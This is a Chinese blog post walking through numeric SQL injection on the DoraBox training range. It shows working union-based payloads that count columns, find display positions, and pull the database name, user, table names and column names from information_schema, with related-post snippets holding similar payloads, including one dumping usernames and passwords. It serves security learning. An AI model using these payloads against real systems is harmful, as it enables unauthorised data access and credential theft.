DoraBox-SQL注入篇1–数字型

最新推荐文章于 2024-07-12 09:17:17 发布
最新推荐文章于 2024-07-12 09:17:17 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: 安全 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45780190/article/details/120370536
版权

DoraBox - 掌握常见漏洞攻防

SQL注入篇1–数字型

1.判断数据库有几个

输入1查询
在这里插入图片描述
输入2查询
在这里插入图片描述

输入3查询
在这里插入图片描述

发现再也没有数据库查询出来,也就代表着数据库只有两个

2.判断是否存在注入,注入是字符型还是数字型(其实我们已经知道注入是数字类型,但为了更好的学习,按步骤进行学习)

当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

接着我们分别输入

1 and 1=1
1 and 1=2

在这里插入图片描述
在这里插入图片描述

输入字符类型时可以知道均报错

1' and '1'=1'
1' and '1'=2'

在这里插入图片描述

通过这里我们可以判断该地的注入输入字符类型。

3.猜解SQL查询语句中的字段数

输入1 order by 2 #,查询成功:(注意此处的语句,#是注释后面的单引号,前面的’是闭合SQL的“,一定要记住ORDERBY 后加数字不是字符 )

当我们输入字段为3时,还是能成功查询
在这里插入图片描述

当我们输入字段为4时,显示查询失败。
在这里插入图片描述

这也表示这里的字段数只有3个

4.确定显示的字段位置
-1 union select 1,2,3 #

在这里插入图片描述

从结果可以看出来字段显示的位置是2和3.

5.获取当前的数据库名和用户名
-1 union select 1,database(),user() #

在这里插入图片描述

通过回显可以看到具体数据库和用户

6.获取数据库中的表名
-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='pentest' #

在这里插入图片描述

数据库表名为:account,news

7.获取表中的字段名
-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='account' #

在这里插入图片描述

account表中有id,rest,own三个字段

-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='news' #

在这里插入图片描述

news 表中有id,title,content三个字段

从字段拿取信息就不展示了。

kb2414
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DoraBox靶场(一)SQL注入
Lorezon的博客
03-17 280
SQLi数字型 输入1 返回正常,并且出现查询使用的整条SQL语句: 常规拼接and 1=1返回正常。 拼接and 1=2页面异常。 判断字段长。 3正常,4异常,字段为3。 判断回显点。 查询数据库名称。 查询表名 查值。 SQLi字符型 字符型和数字型的区别就是有无单引号来闭合,当没有单引号闭合时候,输出没有结果。 单引号进行闭合 判断出回显点接下来就和数字型一样的步骤了,注意闭...
【合天网安】DoraBox靶场之SQL数字型注入攻击
hehigoxqc606的博客
09-01 167
SQL注入类型: 数字型: select * from news where id=1 数字型注入就是我们的数据不需要再闭合单引号可以直接注入到查询中 注: 用group_concat 能让查看的数据出现在一行 过程: 1、首先判断是不是数字型,由于id=2-1与id=1的结果一样,说明是数据型。 2、也可以根据响应数据不同判断存在数字型SQL注入 3、确定字段数,判断表中有多少列,通过order by子句根据指定的列对结果集进行排序的特性,依次增大order by后的值,
DoraBoxSQL注入
justoneu的博客
06-24 721
什么是SQL注入?:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句 字符型与数字型的区别在于,变量是否用单引号包裹,不闭合单引号则无法查询结果。 搜索型SQL注入 一些网站为了方便用户查找网站的资源,提供了...
DoraBox-sql注入
weixin_43938446的博客
04-11 223
SQLi 数字型 查看有多少列:order by 4之后报错。sql:SELECT * FROM news WHERE id = 1 union select 1,user(),database() limit 1,5 爆出库名-在这里我们确定了数据库为pentest,登录用户为root,接着我们去爆表名。 sql:SELECT * FROM news WHERE id = 1 union se...
sqli-labs第一节 get-字符型注入
weixin_30388677的博客
05-04 105
https://blog.csdn.net/sherlock17/article/details/644544491.SQL注入漏洞的几种判断方法①http://www.heetian.com/showtail.asp?id=40'②http://www.heetian.com/showtail.asp?id=40 and 1=1③http://www.heet...
DoraBox ——SQL注入数字型、字符型、搜索型)练习笔记
weixin_46204746的博客
02-29 418
1. 整型 在搜索框中输入一个整数 开始判断数据库的字段数,在框中不断输入:1 order by 1(2,3,4),每次都增大order by后面的数字 直到输入框中输入:1 order by 4时报错,可知字段数为3 开始判断字段中的输出位置:0 union select 1, 2, 3 开始爆数据库:0 union select 1, 2, database() 爆当前数据库中的所有表名...
MySQL 面试题-SQL注入.docx
09-17
1. SQL注入的原理与防止方法: SQL注入发生时,攻击者利用程序对用户输入数据的不恰当处理,将恶意SQL命令嵌入到正常查询中。防止SQL注入的方法主要包括: - 参数化查询:使用预编译的SQL语句,将用户输入作为参数...
DoraBox-master.zip
03-17
1. SQL注入:这是一种利用不安全的数据库查询语句来获取未经授权的数据或执行恶意操作的攻击。在DoraBox中,你可以尝试构造恶意输入,观察系统如何响应,并学习如何使用参数化查询或预编译语句来防止此类攻击。 2. ...
T-SQL如何防止SQL注入的解决方法
09-11
SQL注入是一种常见的网络安全威胁,它发生在攻击者通过输入恶意的SQL语句来操纵数据库系统时。攻击者通常利用应用程序对用户输入数据的不适当验证,将有害的SQL代码嵌入到查询中,导致服务器执行非预期的数据库操作...
【基础】第01:PHP代码审计笔记--SQL注入1
08-03
【PHP代码审计笔记——SQL注入1】主要探讨的是在PHP环境中如何防止SQL注入攻击,特别是针对MySQL数据库SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句,利用程序漏洞来执行非授权的操作,如获取...
SQL字符型注入漏洞.pdf
07-18
配套博客:https://blog.csdn.net/qq_41739364/article/details/94025729
DoraBox sql注入&文件上传
B_roin的博客
03-09 391
SQL注入 1.sqli数字型 :判断是否存在注入点,执行1 and 1=1,有回显,再执行1 and 1=2发现回显不同,判断存在注入点 :判断字段数,执行1 order by 3以及执行1 order by 4时报错,判断字段数为3 :判断具体回显位,执行-1 union select 1,2,3 :获取数据库名和当前用户名,执行-1 union select 1,database(),...
【合天网安】DoraBox靶场之搜索型SQL注入
hehigoxqc606的博客
09-01 297
搜索型: 闭合单引号和百分号,手工注入获取数据 Select * from news where id like ‘%password%’ 简介: 搜索型注入又称之为文本框输入。一些网站为了方便面用户查询网站的资源,提供了搜索的功能,GET型一般用在网站上的搜索,POST型则用在用户的注入;可以从form表单的method属性来区分是GET还是POST。 搜索型(文本框 )注入往往是因为程序员在编写代码时,忽略了对其变量的过滤,导致攻击者输入恶意变量使数据库执行。 实验过程: 1、判断是否存.
SQL注入字符型注入
qq_64332865的博客
02-17 647
访问sqli-labs网站 用火狐浏览器http://ip/sqli-Labs/Less-2/,登陆后先顶一个GET参数,再网址后边加上?id=1 显示用户名密码为Dumb 可以使用火狐浏览器带的hackbar工具,可以用来调整参数 寻找注入点 分别使用三条payload寻找注入点和判断注入类型 在原来的网址后加上?id=1’ 运行后报错 然后再换成?id=1 and 1=1 然后就运行正常 再把1=1换成1=2,再显示 结果没...
sql注入之字符型注入
m0_63436163的博客
02-01 816
字符型注入就是用户在前端的输入未经过过滤或处理用户输入的字符串插入到后端数据库查询语句,后端的SQL查询语句将参数值用引号或者括号等特殊符号包裹起来,改变了原有的查询语句,从而形成字符型注入。id=1' and 1=1还是?id = 1' and 1=2都能够正常显示出页面,所以确定他是字符型注入。id = 1" and 1=2都能够正常显示出页面,所以确定他是字符型注入。id=1 and 1=1还是?id = 1 and 1=2都能够正常显示出页面,所以确定他是字符型注入。1、判断是否存在注入点。
DoraBox实战】————1、SQL注入分析与研究
Fly_鹏程万里
08-06 742
前言 本文章将对SQL数字型、字符型、搜索型3种注入漏洞的分析并利用~ SQL数字型注入 简介:当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。 分析:首先,我们可以来看看该sql_num.php文件的设计: 在这里我们从上面往下面分析,首先我们看一下conn.php文件,发现是数据库连接文件 之后查看function.class.php文件,发现是功能函数...
简单的SQL字符型注入
最新发布
qq_74350234的博客
07-12 763
输入:-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+输入:-1' union select 1,2,group_concat(username,'-',password) from users --+可以输入:1' and 1=2 union select 1,2,3--+ 或者-1' union select 1,2,3--+
【合天网安】DoraBox靶场之SQL字符型注入攻击
hehigoxqc606的博客
09-01 188
字符型: 当输入的参数x为字符型时,通常在.php中SQL语句类型大致如下: select * from <表名> where id = ‘x’ 这种类型我们同样可以使用and ‘1’=‘1和and ‘1’ = ‘2来判断。 Url 地址中输入 http://xxx/abc.php?id= x' and '1'='1 页面运行正常,继续进行下一步。 Url 地址中继续输入 http://xxx/abc.php?id= x' and '1'='2 页面运行错误,则说明此 Sql 注入为字
DoraBox-sql注入数字型
W小哥
12-29 543
第一步:打开目标网站 在框中我们随便输入1 第二步:and 1=1;and 1=2 测试注入点 1=1是永真表达式 而SELECT * FROM news WHERE id = 1 and 1=1只有两个语句SELECT * FROM news WHERE id = 1与1=1全都都为真,页面才会正常显示 1=2是永假表达式 而SELECT * FROM news WHERE id = 1...
DoraBox漏洞平台SQL注入攻防实战总结
总结来说,DoraBox漏洞练习平台提供了一个安全的环境来实践SQL注入攻击的各个方面,包括数字型和字符型注入,帮助安全从业者和开发者更好地理解和防范这类攻击。通过模拟注入,学习如何检测、利用并修复这些漏洞,是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值